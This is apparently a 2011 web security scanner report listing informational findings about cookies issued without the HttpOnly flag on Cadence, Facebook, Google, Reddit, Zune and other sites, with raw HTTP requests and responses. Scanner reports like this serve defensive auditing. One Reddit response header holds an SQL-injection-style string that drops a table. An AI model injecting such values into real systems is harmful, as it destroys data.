Content-Length: 140289
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.20917.1142
X-Pingback: http://www.cadence.com/Community/blogs/fv/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:57 GMT; expires=Fri, 06-Jul-2012 00:00:57 GMT; path=/
Set-Cookie: CSAnonymous=0cf4fa54-a507-48c0-b09a-3c779c8443a8; expires=Thu, 07-Jul-2011 01:00:57 GMT; path=/
Date: Thu, 07 Jul 2011 00:00:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.24. http://www.cadence.com/community/themes/default/style/DynamicStyle.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /community/themes/default/style/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/themes/default/style/DynamicStyle.aspx HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cadencemossprod%3D%2526pid%253Dus%25253Apages%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-worl%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:55 GMT; CSAnonymous=0cf4fa54-a507-48c0-b09a-3c779c8443a8

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 6539
Content-Type: text/css; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.20917.1142
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:57 GMT; expires=Fri, 06-Jul-2012 00:00:57 GMT; path=/
Date: Thu, 07 Jul 2011 00:00:57 GMT


/* General Styles */

body, html, .CommonContent
{
font-family: Arial, Helvetica;
color: #333333;
}

form
{
background-color: #FFFFFF;
background-image: none;
min-w
...[SNIP]...

7.25. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...

7.26. http://www.google.com/bookmarks/mark

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /bookmarks/mark

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmarks/mark HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: https://www.google.com/bookmarks/mark
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1309961256:S=OFu8ed6ChCeuzoxj; expires=Fri, 05-Jul-2013 14:07:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:07:36 GMT
Server: Search-History HTTP Server
Content-Length: 234
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.google.com/bookmarks
...[SNIP]...

7.27. http://www.masshightech.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.masshightech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:12:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 08 Jul 2008 20:19:59 GMT
Accept-Ranges: bytes
Cteonnt-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:24:56 GMT;path=/
Cache-Control: private
Content-Length: 3638

...[SNIP]...

7.28. http://www.masshightech.com/tech-news-widget/parser/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /tech-news-widget/parser/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech-news-widget/parser/?limit=5&feedName=mass_high_tech&feed=http://www.masshightech.com/rss.html&callback=jsonp1309960847664&_=1309960851255 HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2317
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:13:00 GMT;path=/

jsonp1309960847664({"items":[{"title":"Precision Biopsy closes $2.5M funding","link":"http:\/\/www.masshightech.com\/stories\/2011\/07\/04\/daily17-Precision-Biopsy-closes-25M-funding.html","publishDa
...[SNIP]...

7.29. http://www.masshightech.com/tech-news-widget/widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /tech-news-widget/widget.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech-news-widget/widget.js HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Jun 2009 16:00:16 GMT
Accept-Ranges: bytes
Cteonnt-Length: 8381
Connection: close
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:12:33 GMT;path=/
Cache-Control: private
Content-Length: 8381

/**
* Mass High Tech Widget
* version 1.2
*
* Copyright (c) 2009, All Rights Reserved Worldwide
*
* author Fred LeBlanc <fred@suredev.com> of SureDev via Boston Web Studio
* created for
...[SNIP]...

7.30. http://www.newsvine.com/_tools/seed&save

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_tools/seed&save

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_tools/seed&save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 11:20:51 GMT
Server: Apache/2.2.16 (Debian)
Set-Cookie: vid=3f48247f336bc03315b1da835fb52d70; expires=Tue, 01-Jul-2031 11:20:51 GMT; path=/; domain=.newsvine.com
Location: /_nv/accounts/login?redirect=https%3A%2F%2Fwww.newsvine.com%2F_tools%2Fseed%26save
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


7.31. http://www.reddit.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reddit.com
Path:   /submit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /submit HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.reddit.com/login?dest=%2Fsubmit
Set-Cookie: reddit_first=%7B%22firsttime%22%3A%20%22first%22%7D; Domain=reddit.com; expires=Thu, 31 Dec 2037 23:59:59 GMT; Path=/
Server: '; DROP TABLE servertypes; --
Content-Length: 0
Date: Wed, 06 Jul 2011 13:56:58 GMT
Connection: close


7.32. http://www.tudou.com/v/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equ
...[SNIP]...

7.33. http://www.zune.net/en-US/legal/codeOfConduct.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/legal/codeOfConduct.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/legal/codeOfConduct.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 27495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.34. http://www.zune.net/en-US/legal/termsofservice.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/legal/termsofservice.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/legal/termsofservice.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S101
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 94559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.35. http://www.zune.net/en-US/press/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/press/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/press/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S503
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 33125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.36. http://www.zune.net/en-US/support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/support HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.37. http://www.zune.net/en-US/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/support/ HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S501
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.38. http://www.zune.net/en-us/legal/safety.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/legal/safety.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/legal/safety.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.39. http://www.zune.net/en-us/newsletter/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/newsletter/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/newsletter/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 28717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.40. http://www.zune.net/en-us/products/zuneonxbox/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/products/zuneonxbox/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/products/zuneonxbox/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S101
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 30517


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.41. http://www.zune.net/en-us/support/accessibility/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/support/accessibility/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/support/accessibility/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S104
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.42. http://zune.net/en-US/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /en-US/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/ HTTP/1.1
Host: zune.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:18:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 11:18:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 51934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.43. http://zune.net/en-US/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /en-US/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/default.htm HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S103
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 13:57:51 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48536


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.44. http://zune.net/en-US/flexpage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /en-US/flexpage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/flexpage.aspx HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 13:56:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.45. http://zune.net/en-us/promotions/zunepassatt.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /en-us/promotions/zunepassatt.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/promotions/zunepassatt.htm HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S501
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 13:57:51 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 26659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.46. http://zune.net/xweb/www/cms/templates/flexpage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /xweb/www/cms/templates/flexpage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xweb/www/cms/templates/flexpage.aspx HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
